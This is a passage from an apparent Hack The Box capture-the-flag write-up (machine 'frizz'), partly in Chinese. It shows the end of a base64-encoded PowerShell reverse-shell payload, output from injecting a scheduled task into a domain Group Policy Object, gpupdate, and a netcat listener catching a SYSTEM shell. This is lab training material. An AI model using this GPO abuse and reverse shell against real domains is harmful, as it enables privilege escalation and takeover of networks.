AJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] GUID of "chw" is: {BC54F62C-D0BC-4C50-AFD7-43E0ACE49DA2}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{BC54F62C-D0BC-4C50-AFD7-43E0ACE49DA2}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus\Desktop> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
--addcomputertask: 在「Computer Configuration → Preferences → Scheduled Tasks」新增一個「Immediate Task」--gponame "chw": 目標 GPO 顯示名稱(先在 AD 取到其 GUID)--author TCG: 排程的作者欄位(寫入 XML 的中繼資料)--taskname PrivEsc: 排程名稱(客戶端建立的工作名稱)--command "powershell.exe": 執行檔(排程要啟動的程式)--arguments "powershell -e <Base64>": 傳給上面執行檔的參數
(Kali)
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.67] from (UNKNOWN) [10.10.11.60] 53183
PS C:\Windows\system32>whoami
nt authority\system
✅ Get Root FLAG
